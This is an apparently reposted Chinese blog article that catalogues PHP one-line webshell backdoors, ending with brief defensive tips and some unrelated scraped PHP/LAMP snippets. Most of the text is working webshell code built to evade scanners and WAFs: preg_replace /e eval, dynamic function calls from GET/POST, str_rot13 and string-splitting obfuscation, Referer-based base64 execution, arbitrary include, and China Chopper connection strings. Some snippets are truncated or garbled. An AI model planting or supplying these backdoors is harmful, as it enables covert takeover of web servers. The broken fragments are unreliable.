我們以乙個學習的心態來對待這些php後門程式,很多php後門**讓我們看到程式設計師們是多麼的用心良苦。
強悍的php一句話後門
這類後門讓**、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的php一句話木馬。
利用404頁面隱藏php小馬:
404頁面是**常用的檔案,一般建議好後很少有人會去對它進行檢查修改,這時我們可以利用這一點進行隱藏後門。
無特徵隱藏php一句話:<?php
session_start();
$_post['code'] && $_session['thecode'] = trim($_post['code']);
$_session['thecode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_session[\'thecode\']))','a');
將$_post['code']的內容賦值給$_session['thecode'],然後執行$_session['thecode'],亮點是沒有特徵碼。用掃瞄工具來檢查**的話,是不會報警的,達到目的了。
超級隱蔽的php後門:<?php $_get[a]($_get[b]);?>
僅用get函式就構成了木馬;
利用方法:?a=assert&b=$;
執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。
層級請求,編碼執行php後門:
此方法用兩個檔案實現,檔案1<?php
//後門url
通過http請求中的http_referer來執行經過base64編碼的**,來達到後門的效果,一般waf對referer這些檢測要鬆一點,或者沒有檢測。用這個思路bypass waf不錯。
php後門生成工具weevely
weevely是一款針對php的webshell的自由軟體,可用於模擬乙個類似於telnet的連線shell,weevely通常用於web程式的漏洞利用,隱藏後門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的伺服器端php**是經過了base64編碼的,所以可以騙過主流的防毒軟體和ids,上傳伺服器端**後通常可以通過weevely直接執行。
weevely所生成的php後門所使用的方法是現在比較主流的base64加密結合字串變形技術,後門中所使用的函式均是常用的字串處理函式,被作為檢查規則的eval,system等函式都不會直接出現在**中,從而可以致使後門檔案繞過後門查詢工具的檢查。使用暗組的web後門查殺工具進行掃瞄,結果顯示該檔案無任何威脅。
以上是大概介紹下邊是截圖,相關使用方法亦家就不在這介紹了,簡單的科普一下。
三個變形的一句話php木馬
第乙個<?php ($_=@$_get[2]).@$_($_post[1])?>
第二個<?php
在菜刀裡寫http://site/2.php?_=assert&__=eval($_post['pass']) 密碼是pass。如果你用菜刀的附加資料的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。
第三個($b4dboy = $_post['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(『riny』)即編碼後的eval,完全避開了關鍵字,又不失效果,讓人**!
最後列幾個高階的php一句話木馬後門:1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_post['h'],"access");
//菜刀一句話
2、$filename=$_get['xbid'];
include ($filename);
//危險的include函式,直接編譯任何檔案為php格式執行
3、$reg="c"."o"."p"."y";
$reg($_files[myfile][tmp_name],$_files[myfile][name]);
//重新命名任何檔案
4、$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_post['h'],"access");
//菜刀一句話
5、include ($uid);
//危險的include函式,直接編譯任何檔案為php格式執行,post www.***.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程式後門**
程式**
//容錯**
程式**
//使用lanker一句話客戶端的專家模式執行相關的php語句
程式**
$_post['sa']($_post['sb']);?>
程式**
$_post['sa']($_post['sb'],$_post['sc'])?>
程式**
@preg_replace("/[email]/e",$_post['h'],"error");
//使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入
程式**
h=@eval_r($_post1);
程式**
//繞過<?限制的一句話
綜上,這些php一句話後門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點就在下邊的總結!
如何應對php一句話後門:
2,伺服器日誌檔案要經常看,經常備份
3,對每個站點進行嚴格的許可權分配
4,對動態檔案及目錄經常批量安全審查
5,學會如何進行手工防毒《即行為判斷查殺》
6,時刻關注,或滲入活躍的網路安全營地
7,對伺服器環境層級化處理,哪怕乙個函式也可做規則
我們認為當管理的站點多了,資料量大時,我們應合理應用一些輔助工具,但不應完全依賴這些工具,技術是時刻在更新進步的,最為重要的是你應學會和理解,編寫這些強悍後門的人所處思維,角色上的換位可為你帶來更大的進步。
via[亦家網路]
php的Apa紅燈 Deepin 下安裝 LAMP
ubuntu deepin linux 下使用 apt get 安裝所需套的軟體 lamp 1.安裝 apacache2 apt get install apache2 配置檔案 etc apache2 apache2.conf service apache2 start service apach...
關於PHP的那些坑
因為php是弱型別語言,常常會發生許多意想不到的問題,所以,我們再次一一細數這些我們踏過的坑 1 foreach中自動回將key為數值的轉化成整型,造成無法匹配 function translate keyword return 其他 echo translate google php eol ec...
PHP那些瑣碎的知識點
php有很多很奇特 很難記的知識點,我做了一下記錄 php不會檢查單引號 字串中變數內插或 幾乎 任何轉義序列,所以採用單引號這種方式來定義字串相當簡單快捷。但是,雙引號 則不然,php會檢查字串中的變數或者轉義序列,並輸出變數和轉義序列的值。a 123 print a t print a 輸出 a...